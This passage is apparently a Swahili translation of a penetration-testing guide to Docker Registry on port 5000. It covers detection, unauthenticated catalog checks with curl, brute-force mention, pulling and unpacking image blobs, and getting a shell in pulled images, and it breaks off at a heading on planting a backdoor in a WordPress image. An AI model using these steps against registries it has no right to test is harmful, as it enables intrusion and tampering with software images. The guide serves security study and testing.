Mfumo wa uhifadhi na usambazaji unaojulikana kama Docker registry umewekwa kwa ajili ya picha za Docker ambazo zina majina na zinaweza kuja katika toleo mbalimbali, zilizotofautishwa na vitambulisho. Picha hizi zimepangwa ndani ya maktaba za Docker kwenye usajili, kila maktaba ikihifadhi toleo mbalimbali la picha fulani. Utendaji unaotolewa unaruhusu picha kupakuliwa kwa kifaa au kupakiwa kwenye usajili, ikizingatiwa kuwa mtumiaji ana ruhusa inayohitajika.
DockerHub hutumika kama usajili wa umma wa msingi kwa Docker, lakini watumiaji pia wana chaguo la kuendesha toleo la ndani la usajili/distribusheni ya Docker ya chanzo wazi au kuchagua Docker Trusted Registry inayoungwa mkono kibiashara. Aidha, usajili mbalimbali wa umma unaweza kupatikana mtandaoni.
Kupakua picha kutoka kwenye usajili wa ndani, amri ifuatayo hutumiwa:
dockerpullmy-registry:9000/foo/bar:2.1
Hii amri inapata picha ya foo/bar toleo 2.1 kutoka kwenye usajili wa ndani kwenye kikoa cha my-registry kwenye bandari ya 9000. Kinyume chake, ili kupakua picha hiyo hiyo kutoka DockerHub, hasa ikiwa 2.1 ni toleo jipya, amri inakuwa:
dockerpullfoo/bar
Bandari ya chaguo-msingi: 5000
PORT STATE SERVICE VERSION
5000/tcp open http Docker Registry (API: 2.0)
Kugundua
Njia rahisi ya kugundua huduma hii inayotumika ni kuipata kwenye matokeo ya nmap. Hata hivyo, kumbuka kwamba kama ni huduma inayotegemea HTTP inaweza kuwa nyuma ya wakala wa HTTP na nmap haitaigundua.
Baadhi ya alama za vidole:
Docker registry inaweza pia kusanidiwa kuhitaji uthibitisho:
curl-khttps://192.25.197.3:5000/v2/_catalog#If Authentication required{"errors":[{"code":"UNAUTHORIZED","message":"authentication required","detail":[{"Type":"registry","Class":"","Name":"catalog","Action":"*"}]}]}
#If no authentication required{"repositories":["alpine","ubuntu"]}
Ikiwa Usajili wa Docker unahitaji uthibitisho unaweza jaribu kuvunja nguvu kutumia hii.
Ikiwa unapata sifa halali utahitaji kuzitumia kuchambua usajili, katika curl unaweza kuzitumia kama hivi:
Mara baada ya kupata ufikivu wa docker registry hapa kuna baadhi ya amri unazoweza kutumia kuchambua:
#List repositoriescurl-shttp://10.10.10.10:5000/v2/_catalog{"repositories":["alpine","ubuntu"]}#Get tags of a repositorycurl-shttp://192.251.36.3:5000/v2/ubuntu/tags/list{"name":"ubuntu","tags":["14.04","12.04","18.04","16.04"]}#Get manifestscurl-shttp://192.251.36.3:5000/v2/ubuntu/manifests/latest{"schemaVersion":1,"name":"ubuntu","tag":"latest","architecture":"amd64","fsLayers": [{"blobSum":"sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935"},{"blobSum":"sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"},{"blobSum":"sha256:e7c96db7181be991f19a9fb6975cdbbd73c65f4a2681348e63a141a2192a5f10"}],"history": [{"v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"container_config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:96c69e5db7e6d87db2a51d3894183e9e305a144c73659d5578d300bd2175b5d6 in /etc/network/if-post-up.d \"],\"ArgsEscaped\":true,\"Image\":\"sha256:055936d3920576da37aa9bc460d70c5f212028bda1c08c0879aedf03d7a66ea1\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":null},\"created\":\"2019-05-13T14:06:51.794876531Z\",\"docker_version\":\"18.09.4\",\"id\":\"911999e848d2c283cbda4cd57306966b44a05f3f184ae24b4c576e0f2dfb64d0\",\"os\":\"linux\",\"parent\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\"}"
},{"v1Compatibility": "{\"id\":\"ebc21e1720595259c8ce23ec8af55eddd867a57aa732846c249ca59402072d7a\",\"parent\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.510395965Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/sh\\\"]\"]},\"throwaway\":true}"
},{"v1Compatibility": "{\"id\":\"7869895562ab7b1da94e0293c72d05b096f402beb83c4b15b8887d71d00edb87\",\"created\":\"2019-05-11T00:07:03.358250803Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:a86aea1f3a7d68f6ae03397b99ea77f2e9ee901c5c59e59f76f93adbb4035913 in / \"]}}"
}],"signatures": [{"header":{"jwk":{"crv":"P-256","kid":"DJNH:N6JL:4VOW:OTHI:BSXU:TZG5:6VPC:D6BP:6BPR:ULO5:Z4N4:7WBX","kty":"EC","x":"leyzOyk4EbEWDY0ZVDoU8_iQvDcv4hrCA0kXLVSpCmg","y":"Aq5Qcnrd-6RO7VhUS2KPpftoyjjBWVoVUiaPluXq4Fg"},"alg":"ES256"},"signature":"GIUf4lXGzdFk3aF6f7IVpF551UUqGaSsvylDqdeklkUpw_wFhB_-FVfshodDzWlEM8KI-00aKky_FJez9iWL0Q","protected":"eyJmb3JtYXRMZW5ndGgiOjI1NjQsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMS0wMS0wMVQyMDoxMTowNFoifQ"}]}#Download one of the previously listed blobscurl http://10.10.10.10:5000/v2/ubuntu/blobs/sha256:2a62ecb2a3e5bcdbac8b6edc58fae093a39381e05d08ca75ed27cae94125f935 --output blob1.tar
#Inspect the insides of each blobtar-xfblob1.tar#After this,inspect the new folders and files created in the current directory
Tafadhali kumbuka kwamba unapopakua na kufungua faili za blobs, faili na folda zitaonekana kwenye saraka ya sasa. Ikiwa unapakua blobs zote na kuzifungua kwenye saraka moja zitafuta thamani kutoka kwa blobs zilizofunguliwa awali, kwa hivyo kuwa mwangalifu. Inaweza kuwa ya kuvutia kufungua kila blob ndani ya saraka tofauti ili uchunguze maudhui halisi ya kila blob.
Uchambuzi kwa kutumia docker
#Once you know which images the server is saving (/v2/_catalog) you can pull themdockerpull10.10.10.10:5000/ubuntu#Check the commands used to create the layers of the imagedockerhistory10.10.10.10:5000/ubuntu#IMAGE CREATED CREATED BY SIZE COMMENT#ed05bef01522 2 years ago ./run.sh 46.8MB#<missing> 2 years ago /bin/sh -c #(nop) CMD ["./run.sh"] 0B#<missing> 2 years ago /bin/sh -c #(nop) EXPOSE 80 0B#<missing> 2 years ago /bin/sh -c cp $base/mysql-setup.sh / 499B#<missing> 2 years ago /bin/sh -c #(nop) COPY dir:0b657699b1833fd59… 16.2MB#Run and get a shelldockerrun-it10.10.10.10:5000/ubuntubash#Leave this shell runningdockerps#Using a different shelldockerexec-it7d3a81fe42d7bash#Get ash shell inside docker container
Kuweka mlango nyuma kwa picha ya WordPress
Katika hali ambapo umepata Docker Registry ikihifadhi picha ya wordpress unaweza kuweka mlango nyuma.
Tengeneza mlango nyuma: